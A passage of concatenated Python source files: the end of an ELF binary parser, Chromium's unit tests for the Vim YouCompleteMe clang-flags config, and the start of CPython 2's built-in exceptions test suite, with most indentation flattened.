return "{d_tag=0x%x, d_val=0x%x, valstr='%s'}" % \
(self.d_tag, self.d_val, self.valstr)
else:
return "{d_tag=0x%x, d_val=0x%x}" % \
(self.d_tag, self.d_val)
#===============================================================================
#===============================================================================
class Elf(object):
def __init__(self):
self.ehdr = None
self.phdrTable = []
self.shdrTable = []
self.symTable = []
self.dynsymTable = []
self.dynamicEntries = []
self._data = None
def loadFromFile(self, filePath):
elfFile = None
try:
# Open file, map it in memory and start reading it
elfFile = open(filePath, "rb")
self._data = mmap.mmap(elfFile.fileno(), 0, access=mmap.ACCESS_READ)
self._read()
except struct.error as ex:
raise ElfError(str(ex))
finally:
# In any case, close file
if elfFile:
elfFile.close()
def close(self):
if self._data:
self._data.close()
self._data = None
def _read(self):
self._readEhdr()
self._readPhdrTable()
self._readShdrTable()
for shdr in self.shdrTable:
shdr.namestr = self._getString(self.ehdr.e_shstrndx, shdr.sh_name)
if shdr.sh_type == SHT_SYMTAB:
self._readSymTable(shdr, self.symTable)
elif shdr.sh_type == SHT_DYNSYM:
self._readSymTable(shdr, self.dynsymTable)
elif shdr.sh_type == SHT_DYNAMIC:
self._readDynamicSection(shdr)
def _readEhdr(self):
        # Give all data, we don't know yet which size to give
self.ehdr = ElfEhdr(self._data)
def _readPhdrTable(self):
size = ElfPhdr.size32 if self.ehdr.is32Bit() else ElfPhdr.size64
for i in range(0, self.ehdr.e_phnum):
offset = self.ehdr.e_phoff + i*self.ehdr.e_phentsize
phdr = ElfPhdr(self, i, self._data[offset:offset+size])
self.phdrTable.append(phdr)
def _readShdrTable(self):
size = ElfShdr.size32 if self.ehdr.is32Bit() else ElfShdr.size64
for i in range(0, self.ehdr.e_shnum):
offset = self.ehdr.e_shoff + i*self.ehdr.e_shentsize
shdr = ElfShdr(self, i, self._data[offset:offset+size])
self.shdrTable.append(shdr)
def _readSymTable(self, shdr, table):
size = ElfSym.size32 if self.ehdr.is32Bit() else ElfSym.size64
for i in range(0, shdr.sh_size//size):
offset = shdr.sh_offset + i*size
sym = ElfSym(self, i, self._data[offset:offset+size])
sym.namestr = self._getString(shdr.sh_link, sym.st_name)
table.append(sym)
def _readDynamicSection(self, shdr):
size = ElfDyn.size32 if self.ehdr.is32Bit() else ElfDyn.size64
for i in range(0, shdr.sh_size//size):
offset = shdr.sh_offset + i*size
dyn = ElfDyn(self, i, self._data[offset:offset+size])
if dyn.d_tag in ElfDyn.strTags:
dyn.valstr = self._getString(shdr.sh_link, dyn.d_val)
self.dynamicEntries.append(dyn)
if dyn.d_tag == DT_NULL:
break
def _getString(self, idx, offset):
if idx >= len(self.shdrTable):
return None
shdrStr = self.shdrTable[idx]
if offset >= shdrStr.sh_size:
return None
start = shdrStr.sh_offset + offset
end = self._data.find(b"\x00", start, start + shdrStr.sh_size)
if end == -1:
end = start + shdrStr.sh_size
return self._data[start:end].decode("UTF-8")
    # Compute a hash of the elf over sections that are loadable and have data in the file.
    # @param hash : an object from 'hashlib' that supports the 'update' and
    #               'hexdigest' methods.
def computeHash(self, hash):
for shdr in self.shdrTable:
if (shdr.sh_flags&SHF_ALLOC) != 0 and shdr.sh_type != SHT_NOBITS:
start = shdr.sh_offset
end = shdr.sh_offset + shdr.sh_size
hash.update(self._data[start:end])
return hash.hexdigest()
def getSection(self, name):
for shdr in self.shdrTable:
if shdr.namestr == name:
return shdr
return None
def getSectionData(self, shdr):
return self._data[shdr.sh_offset:shdr.sh_offset+shdr.sh_size]
def hasSection(self, name):
return self.getSection(name) is not None
def __str__(self):
return "\n".join(["ehdr=%s" % self.ehdr] + \
["phdr[%d]=%s" % (phdr.idx, phdr) for phdr in self.phdrTable] + \
["shdr[%d]=%s" % (shdr.idx, shdr) for shdr in self.shdrTable] + \
["sym[%d]=%s" % (sym.idx, sym) for sym in self.symTable] + \
["dynsym[%d]=%s" % (sym.idx, sym) for sym in self.dynsymTable])
#===============================================================================
# For test.
#===============================================================================
if __name__ == "__main__":
def main():
import sys
import hashlib
try:
elf = Elf()
elf.loadFromFile(sys.argv[1])
print(elf)
print("md5:%s" % elf.computeHash(hashlib.md5())) # IGNORE:E1101
print("sha1:%s" % elf.computeHash(hashlib.sha1())) # IGNORE:E1101
elf.close()
except ElfError as ex:
print(ex)
main()
|
|
#!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests for chromium.ycm_extra_conf.
These tests should be getting picked up by the PRESUBMIT.py in /tools/vim.
Currently the tests only run on Linux and require 'ninja' to be available on
PATH. Due to these requirements, the tests should only be run on upload.
"""
import imp
import os
import shutil
import stat
import string
import subprocess
import sys
import tempfile
import unittest
def CreateFile(path,
copy_from = None,
format_with = None,
make_executable = False):
"""Creates a file.
If a file already exists at |path|, it will be overwritten.
Args:
path: (String) Absolute path for file to be created.
copy_from: (String or None) Absolute path to source file. If valid, the
contents of this file will be written to |path|.
format_with: (Dictionary or None) Only valid if |copy_from| is also valid.
The contents of the file at |copy_from| will be passed through
string.Formatter.vformat() with this parameter as the dictionary.
    make_executable: (Boolean) If true, the file at |path| will be made executable.
"""
if not os.path.isabs(path):
raise Exception(
'Argument |path| needs to be an absolute path. Got: "{}"'.format(path))
with open(path, 'w') as f:
if copy_from:
with open(copy_from, 'r') as source:
contents = source.read()
if format_with:
formatter = string.Formatter()
contents = formatter.vformat(contents, None, format_with)
f.write(contents)
if make_executable:
statinfo = os.stat(path)
os.chmod(path, statinfo.st_mode | stat.S_IXUSR)
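# Self-contained demonstration of CreateFile (illustrative only, not used by
# the tests below): expand a "{name}" placeholder from a template file into a
# new file via |format_with|.
def _DemoCreateFile():
  demo_dir = tempfile.mkdtemp()
  template = os.path.join(demo_dir, 'greeting.in')
  with open(template, 'w') as f:
    f.write('Hello, {name}!\n')
  target = os.path.join(demo_dir, 'greeting.txt')
  CreateFile(target, copy_from=template, format_with={'name': 'Chromium'})
  with open(target) as f:
    assert f.read() == 'Hello, Chromium!\n'
  shutil.rmtree(demo_dir)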
class Chromium_ycmExtraConfTest(unittest.TestCase):
def SetUpFakeChromeTreeBelowPath(self):
"""Create fake Chromium source tree under self.test_root.
The fake source tree has the following contents:
<self.test_root>
| .gclient
|
+-- src
| | DEPS
| | three.cc
| |
| +-- .git
|
+-- out
|
+-- gn
build.ninja
"""
self.chrome_root = os.path.abspath(os.path.normpath(
os.path.join(self.test_root, 'src')))
self.out_dir = os.path.join(self.chrome_root, 'out', 'gn')
os.makedirs(self.chrome_root)
os.makedirs(os.path.join(self.chrome_root, '.git'))
os.makedirs(self.out_dir)
CreateFile(os.path.join(self.test_root, '.gclient'))
CreateFile(os.path.join(self.chrome_root, 'DEPS'))
CreateFile(os.path.join(self.chrome_root, 'three.cc'))
# Fake ninja build file. Applications of 'cxx' rule are tagged by which
# source file was used as input so that the test can verify that the correct
# build dependency was used.
CreateFile(os.path.join(self.out_dir, 'build.ninja'),
copy_from=os.path.join(self.test_data_path,
'fake_build_ninja.txt'))
def NormalizeString(self, string):
return string.replace(self.out_dir, '[OUT]').\
replace(self.chrome_root, '[SRC]').replace('\\', '/')
def NormalizeStringsInList(self, list_of_strings):
return [self.NormalizeString(s) for s in list_of_strings]
def setUp(self):
self.actual_chrome_root = os.path.normpath(
os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../..'))
sys.path.append(os.path.join(self.actual_chrome_root, 'tools', 'vim'))
self.test_data_path = os.path.join(self.actual_chrome_root, 'tools', 'vim',
'tests', 'data')
self.ycm_extra_conf = imp.load_source('ycm_extra_conf',
'chromium.ycm_extra_conf.py')
self.test_root = tempfile.mkdtemp()
self.SetUpFakeChromeTreeBelowPath()
def tearDown(self):
if self.test_root:
shutil.rmtree(self.test_root)
def testNinjaIsAvailable(self):
p = subprocess.Popen(['ninja', '--version'], stdout=subprocess.PIPE)
_, _ = p.communicate()
self.assertFalse(p.returncode)
def testFindChromeSrc(self):
chrome_source = self.ycm_extra_conf.FindChromeSrcFromFilename(
os.path.join(self.chrome_root, 'chrome', 'one.cpp'))
self.assertEquals(chrome_source, self.chrome_root)
chrome_source = self.ycm_extra_conf.FindChromeSrcFromFilename(
os.path.join(self.chrome_root, 'one.cpp'))
self.assertEquals(chrome_source, self.chrome_root)
def testCommandLineForKnownCppFile(self):
command_line = self.ycm_extra_conf.GetClangCommandLineFromNinjaForSource(
self.out_dir, os.path.join(self.chrome_root, 'one.cpp'))
self.assertEquals(
command_line, ('../../fake-clang++ -Ia -isysroot /mac.sdk -Itag-one '
'../../one.cpp -o obj/one.o'))
def testCommandLineForUnknownCppFile(self):
command_line = self.ycm_extra_conf.GetClangCommandLineFromNinjaForSource(
self.out_dir, os.path.join(self.chrome_root, 'unknown.cpp'))
self.assertEquals(command_line, None)
def testGetClangOptionsForKnownCppFile(self):
clang_options = \
self.ycm_extra_conf.GetClangOptionsFromNinjaForFilename(
self.chrome_root, os.path.join(self.chrome_root, 'one.cpp'))
self.assertEquals(self.NormalizeStringsInList(clang_options), [
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-one'
])
def testOutDirNames(self):
out_root = os.path.join(self.chrome_root, 'out_with_underscore')
out_dir = os.path.join(out_root, 'gn')
shutil.move(os.path.join(self.chrome_root, 'out'),
out_root)
clang_options = \
self.ycm_extra_conf.GetClangOptionsFromNinjaForFilename(
self.chrome_root, os.path.join(self.chrome_root, 'one.cpp'))
self.assertIn('-I%s/a' % self.NormalizeString(out_dir),
self.NormalizeStringsInList(clang_options))
self.assertIn('-I%s/tag-one' % self.NormalizeString(out_dir),
self.NormalizeStringsInList(clang_options))
def testGetFlagsForFileForKnownCppFile(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'one.cpp'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-one'
])
def testGetFlagsForFileForUnknownCppFile(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'nonexistent.cpp'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-default'
])
def testGetFlagsForFileForUnknownCppNotTestFile(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'test_nonexistent.cpp'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-default'
])
def testGetFlagsForFileForUnknownHeaderFile(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'nonexistent.h'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-default'
])
def testGetFlagsForFileForUnknownUnittestFile(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'nonexistent_unittest.cpp'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-default-test'
])
def testGetFlagsForFileForUnknownBrowsertestFile2(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'nonexistent_browsertest.cpp'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-default-test'
])
def testGetFlagsForFileForKnownHeaderFileWithAssociatedCppFile(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'three.h'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-three'
])
def testSourceFileWithNonClangOutputs(self):
# Verify assumption that four.cc has non-compiler-output listed as the first
# output.
p = subprocess.Popen(['ninja', '-C', self.out_dir, '-t',
'query', '../../four.cc'],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
universal_newlines=True)
stdout, _ = p.communicate()
self.assertFalse(p.returncode)
self.assertEquals(stdout,
'../../four.cc:\n'
' outputs:\n'
' obj/linker-output.o\n'
' obj/four.o\n')
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'four.cc'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-four'
])
def testSourceFileWithOnlyNonClangOutputs(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'five.cc'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'-isysroot',
'/mac.sdk',
'-I[OUT]/tag-default'
])
def testGetFlagsForSysrootAbsPath(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'six.cc'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'--sysroot=/usr/lib/sysroot-image',
])
def testGetFlagsForSysrootRelPath(self):
result = self.ycm_extra_conf.FlagsForFile(
os.path.join(self.chrome_root, 'seven.cc'))
self.assertTrue(result)
self.assertTrue('do_cache' in result)
self.assertTrue(result['do_cache'])
self.assertTrue('flags' in result)
self.assertEquals(self.NormalizeStringsInList(result['flags']), [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x', 'c++',
'-I[SRC]',
'-Wno-unknown-warning-option',
'-I[OUT]/a',
'--sysroot=[SRC]/build/sysroot-image',
])
if __name__ == '__main__':
if not os.path.isfile('chromium.ycm_extra_conf.py'):
print('The test must be run from src/tools/vim/ directory')
sys.exit(1)
unittest.main()
|
|
# Python test set -- part 5, built-in exceptions
import os
import sys
import unittest
import pickle, cPickle
from test.test_support import (TESTFN, unlink, run_unittest, captured_output,
check_warnings, cpython_only)
from test.test_pep352 import ignore_deprecation_warnings
# XXX This is not really enough, each *operation* should be tested!
class ExceptionTests(unittest.TestCase):
def testReload(self):
# Reloading the built-in exceptions module failed prior to Py2.2, while it
# should act the same as reloading built-in sys.
try:
from imp import reload
import exceptions
reload(exceptions)
except ImportError, e:
self.fail("reloading exceptions: %s" % e)
def raise_catch(self, exc, excname):
try:
raise exc, "spam"
except exc, err:
buf1 = str(err)
try:
raise exc("spam")
except exc, err:
buf2 = str(err)
self.assertEqual(buf1, buf2)
self.assertEqual(exc.__name__, excname)
def testRaising(self):
self.raise_catch(AttributeError, "AttributeError")
self.assertRaises(AttributeError, getattr, sys, "undefined_attribute")
self.raise_catch(EOFError, "EOFError")
fp = open(TESTFN, 'w')
fp.close()
fp = open(TESTFN, 'r')
savestdin = sys.stdin
try:
try:
sys.stdin = fp
x = raw_input()
except EOFError:
pass
finally:
sys.stdin = savestdin
fp.close()
unlink(TESTFN)
self.raise_catch(IOError, "IOError")
self.assertRaises(IOError, open, 'this file does not exist', 'r')
self.raise_catch(ImportError, "ImportError")
self.assertRaises(ImportError, __import__, "undefined_module")
self.raise_catch(IndexError, "IndexError")
x = []
self.assertRaises(IndexError, x.__getitem__, 10)
self.raise_catch(KeyError, "KeyError")
x = {}
self.assertRaises(KeyError, x.__getitem__, 'key')
self.raise_catch(KeyboardInterrupt, "KeyboardInterrupt")
self.raise_catch(MemoryError, "MemoryError")
self.raise_catch(NameError, "NameError")
try: x = undefined_variable
except NameError: pass
self.raise_catch(OverflowError, "OverflowError")
x = 1
for dummy in range(128):
x += x # this simply shouldn't blow up
self.raise_catch(RuntimeError, "RuntimeError")
self.raise_catch(SyntaxError, "SyntaxError")
try: exec '/\n'
except SyntaxError: pass
self.raise_catch(IndentationError, "IndentationError")
self.raise_catch(TabError, "TabError")
# can only be tested under -tt, and is the only test for -tt
#try: compile("try:\n\t1.0/0.0\n \t1.0/0.0\nfinally:\n pass\n", '<string>', 'exec')
#except TabError: pass
#else: self.fail("TabError not raised")
self.raise_catch(SystemError, "SystemError")
self.raise_catch(SystemExit, "SystemExit")
self.assertRaises(SystemExit, sys.exit, 0)
self.raise_catch(TypeError, "TypeError")
try: [] + ()
except TypeError: pass
self.raise_catch(ValueError, "ValueError")
self.assertRaises(ValueError, chr, 10000)
self.raise_catch(ZeroDivisionError, "ZeroDivisionError")
try: x = 1 // 0
except ZeroDivisionError: pass
self.raise_catch(Exception, "Exception")
try: x = 1 // 0
except Exception, e: pass
def testSyntaxErrorMessage(self):
# make sure the right exception message is raised for each of
# these code fragments
def ckmsg(src, msg):
try:
compile(src, '<fragment>', 'exec')
except SyntaxError, e:
if e.msg != msg:
self.fail("expected %s, got %s" % (msg, e.msg))
else:
self.fail("failed to get expected SyntaxError")
s = '''while 1:
try:
pass
finally:
continue'''
if not sys.platform.startswith('java'):
ckmsg(s, "'continue' not supported inside 'finally' clause")
s = '''if 1:
try:
continue
except:
pass'''
ckmsg(s, "'continue' not properly in loop")
ckmsg("continue\n", "'continue' not properly in loop")
@cpython_only
def testSettingException(self):
# test that setting an exception at the C level works even if the
# exception object can't be constructed.
class BadException:
def __init__(self_):
raise RuntimeError, "can't instantiate BadException"
def test_capi1():
import _testcapi
try:
_testcapi.raise_exception(BadException, 1)
except TypeError, err:
exc, err, tb = sys.exc_info()
co = tb.tb_frame.f_code
self.assertEqual(co.co_name, "test_capi1")
self.assertTrue(co.co_filename.endswith('test_exceptions'+os.extsep+'py'))
else:
self.fail("Expected exception")
def test_capi2():
import _testcapi
try:
_testcapi.raise_exception(BadException, 0)
except RuntimeError, err:
exc, err, tb = sys.exc_info()
co = tb.tb_frame.f_code
self.assertEqual(co.co_name, "__init__")
self.assertTrue(co.co_filename.endswith('test_exceptions'+os.extsep+'py'))
co2 = tb.tb_frame.f_back.f_code
self.assertEqual(co2.co_name, "test_capi2")
else:
self.fail("Expected exception")
if not sys.platform.startswith('java'):
test_capi1()
test_capi2()
def test_WindowsError(self):
try:
WindowsError
except NameError:
pass
else:
self.assertEqual(str(WindowsError(1001)),
"1001")
self.assertEqual(str(WindowsError(1001, "message")),
"[Error 1001] message")
self.assertEqual(WindowsError(1001, "message").errno, 22)
self.assertEqual(WindowsError(1001, "message").winerror, 1001)
@ignore_deprecation_warnings
def testAttributes(self):
# test that exception attributes are happy
exceptionList = [
(BaseException, (), {'message' : '', 'args' : ()}),
(BaseException, (1, ), {'message' : 1, 'args' : (1,)}),
(BaseException, ('foo',),
{'message' : 'foo', 'args' : ('foo',)}),
(BaseException, ('foo', 1),
{'message' : '', 'args' : ('foo', 1)}),
(SystemExit, ('foo',),
{'message' : 'foo', 'args' : ('foo',), 'code' : 'foo'}),
(IOError, ('foo',),
{'message' : 'foo', 'args' : ('foo',), 'filename' : None,
'errno' : None, 'strerror' : None}),
(IOError, ('foo', 'bar'),
{'message' : '', 'args' : ('foo', 'bar'), 'filename' : None,
'errno' : 'foo', 'strerror' : 'bar'}),
(IOError, ('foo', 'bar', 'baz'),
{'message' : '', 'args' : ('foo', 'bar'), 'filename' : 'baz',
'errno' : 'foo', 'strerror' : 'bar'}),
(IOError, ('foo', 'bar', 'baz', 'quux'),
{'message' : '', 'args' : ('foo', 'bar', 'baz', 'quux')}),
(EnvironmentError, ('errnoStr', 'strErrorStr', 'filenameStr'),
{'message' : '', 'args' : ('errnoStr', 'strErrorStr'),
'strerror' : 'strErrorStr', 'errno' : 'errnoStr',
'filename' : 'filenameStr'}),
(EnvironmentError, (1, 'strErrorStr', 'filenameStr'),
{'message' : '', 'args' : (1, 'strErrorStr'), 'errno' : 1,
'strerror' : 'strErrorStr', 'filename' : 'filenameStr'}),
(SyntaxError, (), {'message' : '', 'msg' : None, 'text' : None,
'filename' : None, 'lineno' : None, 'offset' : None,
'print_file_and_line' : None}),
(SyntaxError, ('msgStr',),
{'message' : 'msgStr', 'args' : ('msgStr',), 'text' : None,
'print_file_and_line' : None, 'msg' : 'msgStr',
'filename' : None, 'lineno' : None, 'offset' : None}),
(SyntaxError, ('msgStr', ('filenameStr', 'linenoStr', 'offsetStr',
'textStr')),
{'message' : '', 'offset' : 'offsetStr', 'text' : 'textStr',
'args' : ('msgStr', ('filenameStr', 'linenoStr',
'offsetStr', 'textStr')),
'print_file_and_line' : None, 'msg' : 'msgStr',
'filename' : 'filenameStr', 'lineno' : 'linenoStr'}),
(SyntaxError, ('msgStr', 'filenameStr', 'linenoStr', 'offsetStr',
'textStr', 'print_file_and_lineStr'),
{'message' : '', 'text' : None,
'args' : ('msgStr', 'filenameStr', 'linenoStr', 'offsetStr',
'textStr', 'print_file_and_lineStr'),
'print_file_and_line' : None, 'msg' : 'msgStr',
'filename' : None, 'lineno' : None, 'offset' : None}),
(UnicodeError, (), {'message' : '', 'args' : (),}),
(UnicodeEncodeError, ('ascii', u'a', 0, 1, 'ordinal not in range'),
{'message' : '', 'args' : ('ascii', u'a', 0, 1,
'ordinal not in range'),
'encoding' : 'ascii', 'object' : u'a',
'start' : 0, 'reason' : 'ordinal not in range'}),
(UnicodeDecodeError, ('ascii', '\xff', 0, 1, 'ordinal not in range'),
{'message' : '', 'args' : ('ascii', '\xff', 0, 1,
'ordinal not in range'),
'encoding' : 'ascii', 'object' : '\xff',
'start' : 0, 'reason' : 'ordinal not in range'}),
(UnicodeTranslateError, (u"\u3042", 0, 1, "ouch"),
{'message' : '', 'args' : (u'\u3042', 0, 1, 'ouch'),
'object' : u'\u3042', 'reason' : 'ouch',
'start' : 0, 'end' : 1}),
]
try:
exceptionList.append(
(WindowsError, (1, 'strErrorStr', 'filenameStr'),
{'message' : '', 'args' : (1, 'strErrorStr'),
'strerror' : 'strErrorStr', 'winerror' : 1,
'errno' : 22, 'filename' : 'filenameStr'})
)
except NameError:
pass
for exc, args, expected in exceptionList:
try:
raise exc(*args)
except BaseException, e:
if type(e) is not exc:
raise
# Verify module name
self.assertEqual(type(e).__module__, 'exceptions')
# Verify no ref leaks in Exc_str()
s = str(e)
for checkArgName in expected:
self.assertEqual(repr(getattr(e, checkArgName)),
repr(expected[checkArgName]),
'exception "%s", attribute "%s"' %
(repr(e), checkArgName))
# test for pickling support
for p in pickle, cPickle:
for protocol in range(p.HIGHEST_PROTOCOL + 1):
new = p.loads(p.dumps(e, protocol))
for checkArgName in expected:
got = repr(getattr(new, checkArgName))
want = repr(expected[checkArgName])
self.assertEqual(got, want,
'pickled "%r", attribute "%s"' %
(e, checkArgName))
def testDeprecatedMessageAttribute(self):
# Accessing BaseException.message and relying on its value set by
# BaseException.__init__ triggers a deprecation warning.
exc = BaseException("foo")
with check_warnings(("BaseException.message has been deprecated "
"as of Python 2.6", DeprecationWarning)) as w:
self.assertEqual(exc.message, "foo")
self.assertEqual(len(w.warnings), 1)
def testRegularMessageAttribute(self):
# Accessing BaseException.message after explicitly setting a value
# for it does not trigger a deprecation warning.
exc = BaseException("foo")
exc.message = "bar"
with check_warnings(quiet=True) as w:
self.assertEqual(exc.message, "bar")
self.assertEqual(len(w.warnings), 0)
# Deleting the message is supported, too.
del exc.message
with self.assertRaises(AttributeError):
exc.message
@ignore_deprecation_warnings
def testPickleMessageAttribute(self):
# Pickling with message attribute must work, as well.
e = Exception("foo")
f = Exception("foo")
f.message = "bar"
for p in pickle, cPickle:
ep = p.loads(p.dumps(e))
self.assertEqual(ep.message, "foo")
fp = p.loads(p.dumps(f))
self.assertEqual(fp.message, "bar")
@ignore_deprecation_warnings
def testSlicing(self):
# Test that you can slice an exception directly instead of requiring
# going through the 'args' attribute.
args = (1, 2, 3)
exc = BaseException(*args)
self.assertEqual(exc[:], args)
self.assertEqual(exc.args[:], args)
def testKeywordArgs(self):
        # test that builtin exceptions don't take keyword args,
# but user-defined subclasses can if they want
self.assertRaises(TypeError, BaseException, a=1)
class DerivedException(BaseException):
def __init__(self, fancy_arg):
BaseException.__init__(self)
self.fancy_arg = fancy_arg
x = DerivedException(fancy_arg=42)
self.assertEqual(x.fancy_arg, 42)
def testInfiniteRecursion(self):
def f():
return f()
self.assertRaises(RuntimeError, f)
def g():
try:
return g()
except ValueError:
return -1
# The test prints an unraisable recursion error when
# doing "except ValueError", this is because subclass
# checking has recursion checking too.
with captured_output("stderr"):
try:
g()
except RuntimeError:
pass
except:
self.fail("Should have raised KeyError")
else:
self.fail("Should have raised KeyError")
def testUnicodeStrUsage(self):
# Make sure both instances and classes have a str and unicode
# representation.
self.assertTrue(str(Exception))
self.assertTrue(unicode(Exception))
self.assertTrue(str(Exception('a')))
self.assertTrue(unicode(Exception(u'a')))
self.assertTrue(unicode(Exception(u'\xe1')))
def testUnicodeChangeAttributes(self):
# See issue 7309. This was a crasher.
u = UnicodeEncodeError('baz', u'xxxxx', 1, 5, 'foo')
self.assertEqual(str(u), "'baz' codec can't encode characters in position 1-4: foo")
u.end = 2
self.assertEqual(str(u), "'baz' codec can't encode character u'\\x78' in position 1: foo")
u.end = 5
u.reason = 0x345345345345345345
self.assertEqual(str(u), "'baz' codec can't encode characters in position 1-4: 965230951443685724997")
u.encoding = 4000
self.assertEqual(str(u), "'4000' codec can't encode characters in position 1-4: 965230951443685724997")
u.start = 1000
self.assertEqual(str(u), "'4000' codec can't encode characters in position 1000-4: 965230951443685724997")
u = UnicodeDecodeError('baz', 'xxxxx', 1, 5, 'foo')
self.assertEqual(str(u), "'baz' codec can't decode bytes in position 1-4: foo")
u.end = 2
self.assertEqual(str(u), "'baz' codec can't decode byte 0x78 in position 1: foo")
u.end = 5
u.reason = 0x345345345345345345
self.assertEqual(str(u), "'baz' codec can't decode bytes in position 1-4: 965230951443685724997")
u.encoding = 4000
self.assertEqual(str(u), "'4000' codec can't decode bytes in position 1-4: 965230951443685724997")
u.start = 1000
self.assertEqual(str(u), "'4000' codec can't decode bytes in position 1000-4: 965230951443685724997")
u = UnicodeTranslateError(u'xxxx', 1, 5, 'foo')
self.assertEqual(str(u), "can't translate characters in position 1-4: foo")
u.end = 2
self.assertEqual(str(u), "can't translate character u'\\x78' in position 1: foo")
u.end = 5
u.reason = 0x345345345345345345
self.assertEqual(str(u), "can't translate characters in position 1-4: 965230951443685724997")
u.start = 1000
self.assertEqual(str(u), "can't translate characters in position 1000-4: 965230951443685724997")
def test_unicode_errors_no_object(self):
# See issue #21134.
klasses = UnicodeEncodeError, UnicodeDecodeError, UnicodeTranslateError
for klass in klasses:
self.assertEqual(str(klass.__new__(klass)), "")
def test_badisinstance(self):
# Bug #2542: if issubclass(e, MyException) raises an exception,
# it should be ignored
class Meta(type):
def __subclasscheck__(cls, subclass):
raise ValueError()
class MyException(Exception):
__metaclass__ = Meta
pass
with captured_output("stderr") as stderr:
try:
raise KeyError()
except MyException, e:
self.fail("exception should not be a MyException")
except KeyError:
pass
except:
self.fail("Should have raised KeyError")
else:
self.fail("Should have raised KeyError")
with captured_output("stderr") as stderr:
def g():
try:
return g()
except RuntimeError:
return sys.exc_info()
e, v, tb = g()
self.assertTrue(e is RuntimeError, e)
self.assertIn("maximum recursion depth exceeded", str(v))
def test_new_returns_invalid_instance(self):
# See issue #11627.
class MyException(Exception):
def __new__(cls, *args):
return object()
with self.assertRaises(TypeError):
raise MyException
def test_assert_with_tuple_arg(self):
try:
assert False, (3,)
except AssertionError as e:
self.assertEqual(str(e), "(3,)")
def test_bad_exception_clearing(self):
